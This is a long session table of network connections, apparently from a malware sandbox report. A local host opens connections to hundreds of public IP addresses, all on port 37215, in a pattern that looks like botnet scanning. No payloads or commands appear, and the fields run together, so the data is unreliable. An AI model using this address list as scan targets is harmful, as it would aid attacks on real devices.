                                                  18503192.168.2.135283041.150.248.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18504192.168.2.1356290157.206.0.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18505192.168.2.134822063.2.66.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18506192.168.2.1343016157.105.187.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18507192.168.2.134550441.223.110.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18508192.168.2.135436287.235.72.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18509192.168.2.135364441.80.248.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18510192.168.2.1340750157.178.11.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18511192.168.2.1353750203.110.188.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18512192.168.2.1358492200.216.208.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18513192.168.2.1356918197.50.19.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18514192.168.2.1355032157.129.29.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18515192.168.2.1357362197.1.40.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18516192.168.2.1344528157.168.140.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18517192.168.2.1354862197.45.43.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18518192.168.2.135507841.32.112.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18519192.168.2.1342242197.116.118.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18520192.168.2.13342082.222.158.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18521192.168.2.1353610197.131.136.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18522192.168.2.1353018200.160.79.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18523192.168.2.1344636157.164.166.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18524192.168.2.1334038197.17.48.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18525192.168.2.1340786219.183.139.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18526192.168.2.1335372157.210.106.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18527192.168.2.1347676157.141.89.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18528192.168.2.1359226157.200.147.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18529192.168.2.135498841.13.88.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18530192.168.2.135423414.211.237.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18531192.168.2.1354724217.209.153.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18532192.168.2.1339046157.191.66.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18533192.168.2.1338346197.25.27.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18534192.168.2.1346544157.136.253.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18535192.168.2.1353654197.111.131.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18536192.168.2.133547641.67.245.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18537192.168.2.133807836.199.55.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18538192.168.2.134081241.115.30.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18539192.168.2.1339418157.213.145.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18540192.168.2.1357902137.120.103.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18541192.168.2.1338670157.205.183.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18542192.168.2.1356674221.130.194.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18543192.168.2.1333138211.95.154.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18544192.168.2.1346708157.144.155.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18545192.168.2.1356144157.175.254.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18546192.168.2.1338768157.128.248.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18547192.168.2.1349864197.180.244.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18548192.168.2.135837487.131.86.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18549192.168.2.134654841.88.128.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18550192.168.2.134919841.73.77.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18551192.168.2.133572841.44.133.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18552192.168.2.1338696157.126.145.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18553192.168.2.133380017.200.130.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18554192.168.2.1350326157.171.217.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18555192.168.2.1351928163.170.153.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18556192.168.2.1346456157.114.226.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18557192.168.2.134631241.235.83.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18558192.168.2.133980641.25.140.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18559192.168.2.1335048197.85.49.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18560192.168.2.1353968157.29.4.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18561192.168.2.1344944157.78.208.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18562192.168.2.134805041.155.242.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18563192.168.2.1337984157.167.254.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18564192.168.2.134296025.84.205.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18565192.168.2.135320484.20.179.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18566192.168.2.1346666197.176.90.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18567192.168.2.1357788197.106.152.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18568192.168.2.1347536197.29.91.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18569192.168.2.1337562157.201.137.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18570192.168.2.135178437.238.23.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18571192.168.2.134565641.115.124.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18572192.168.2.1334112197.67.80.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18573192.168.2.135420841.99.253.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18574192.168.2.1345472157.103.43.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18575192.168.2.135235241.146.119.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18576192.168.2.133360441.59.138.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18577192.168.2.1354582151.59.241.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18578192.168.2.135416241.100.247.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18579192.168.2.135795041.216.47.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18580192.168.2.1355412157.169.211.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18581192.168.2.1353208157.111.15.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18582192.168.2.1338094157.68.26.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18583192.168.2.1343108157.104.136.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18584192.168.2.1347998197.145.193.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18585192.168.2.1336670197.50.118.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18586192.168.2.134258441.24.1.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18587192.168.2.1335958200.234.74.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18588192.168.2.1339468124.233.195.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18589192.168.2.1345914197.140.19.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18590192.168.2.1345980197.244.88.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18591192.168.2.1338524157.177.252.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18592192.168.2.1342674163.228.243.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18593192.168.2.135945041.166.155.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18594192.168.2.135567841.23.27.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18595192.168.2.133758441.209.192.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18596192.168.2.133332241.56.237.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18597192.168.2.1357634159.155.134.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18598192.168.2.133528641.253.212.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18599192.168.2.1344478197.54.149.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18600192.168.2.1350832197.228.80.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18601192.168.2.1346968197.20.8.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18602192.168.2.133848641.231.52.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18603192.168.2.134066298.222.143.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18604192.168.2.134849641.116.157.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18605192.168.2.1340808197.6.138.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18606192.168.2.1338330197.20.5.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18607192.168.2.133500241.69.246.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18608192.168.2.134432417.237.185.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18609192.168.2.13564749.186.29.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18610192.168.2.133443641.111.136.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18611192.168.2.1342258157.183.73.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18612192.168.2.1336326197.90.218.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18613192.168.2.133772841.245.94.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18614192.168.2.1338454117.169.185.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18615192.168.2.1344464143.21.113.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18616192.168.2.1344872157.169.2.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18617192.168.2.1357110128.148.42.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18618192.168.2.1345254221.96.211.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18619192.168.2.1345630211.223.22.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18620192.168.2.1349872157.132.253.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18621192.168.2.135452441.83.223.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18622192.168.2.1345566197.242.255.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18623192.168.2.1332994197.36.70.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18624192.168.2.1345334157.70.32.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18625192.168.2.1339938197.198.77.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18626192.168.2.1360120197.79.35.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18627192.168.2.1352028177.79.62.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18628192.168.2.1351402197.21.39.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18629192.168.2.1357678119.118.225.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18630192.168.2.13549865.49.85.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18631192.168.2.1340840197.67.84.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18632192.168.2.134836841.112.184.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18633192.168.2.133788441.223.118.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18634192.168.2.134749439.139.87.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18635192.168.2.1360678124.141.212.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18636192.168.2.133495841.7.126.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18637192.168.2.135131641.48.26.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18638192.168.2.1344352157.208.66.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18639192.168.2.1356812196.41.105.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18640192.168.2.135671441.99.245.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18641192.168.2.1334730157.96.180.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18642192.168.2.1335472119.197.252.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18643192.168.2.1350236157.91.120.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18644192.168.2.1357030197.142.151.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18645192.168.2.1347514204.76.235.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18646192.168.2.1354364197.178.17.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18647192.168.2.133289041.160.252.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18648192.168.2.135444294.28.189.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18649192.168.2.135295441.171.143.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18650192.168.2.134766641.219.4.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18651192.168.2.134467441.139.31.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18652192.168.2.1335520157.205.107.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18653192.168.2.1356982197.248.87.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18654192.168.2.1334736151.149.11.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18655192.168.2.1357938157.119.185.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18656192.168.2.1351872149.223.19.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18657192.168.2.1346592197.244.229.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18658192.168.2.1345046197.248.255.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18659192.168.2.1346666197.236.20.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18660192.168.2.1341960197.65.5.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18661192.168.2.133860841.49.74.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18662192.168.2.1333680157.106.158.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18663192.168.2.135033641.94.241.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18664192.168.2.1357172157.129.148.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18665192.168.2.1359030163.204.63.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18666192.168.2.1359590202.200.225.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18667192.168.2.1338916197.97.125.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18668192.168.2.134391841.255.175.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18669192.168.2.1356286157.137.32.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18670192.168.2.1336726157.118.87.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18671192.168.2.1355404157.18.4.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18672192.168.2.135536041.178.126.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18673192.168.2.1333984157.140.189.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18674192.168.2.1350816157.165.69.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18675192.168.2.134504041.242.206.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18676192.168.2.1335302157.12.20.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18677192.168.2.1334994112.170.149.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18678192.168.2.1345248197.95.176.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18679192.168.2.1337988119.109.16.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18680192.168.2.1333032204.118.206.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18681192.168.2.1338466133.146.184.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18682192.168.2.1342686222.85.97.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18683192.168.2.135996024.107.2.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18684192.168.2.1356900157.109.93.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18685192.168.2.1354992157.98.109.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18686192.168.2.133950041.43.31.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18687192.168.2.1344660197.241.92.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18688192.168.2.1349154157.213.140.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18689192.168.2.1352206157.216.243.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18690192.168.2.1360432157.240.243.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18691192.168.2.133881641.150.43.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18692192.168.2.1354544172.174.84.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18693192.168.2.1336222197.245.100.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18694192.168.2.1357642197.12.102.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18695192.168.2.135137241.155.212.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18696192.168.2.1333206157.26.17.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18697192.168.2.1352028157.155.125.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18698192.168.2.135704241.8.134.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18699192.168.2.134006241.190.3.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18700192.168.2.1349848163.97.136.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18701192.168.2.134920041.5.74.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18702192.168.2.1334160157.82.146.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18703192.168.2.1348414157.242.169.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18704192.168.2.1335178157.80.24.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18705192.168.2.1344830157.81.167.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18706192.168.2.1354428157.198.70.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18707192.168.2.135477241.240.48.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18708192.168.2.1339006197.198.250.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18709192.168.2.134982441.201.133.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18710192.168.2.1339634197.85.206.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18711192.168.2.135593827.216.152.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18712192.168.2.134263641.121.170.9837215
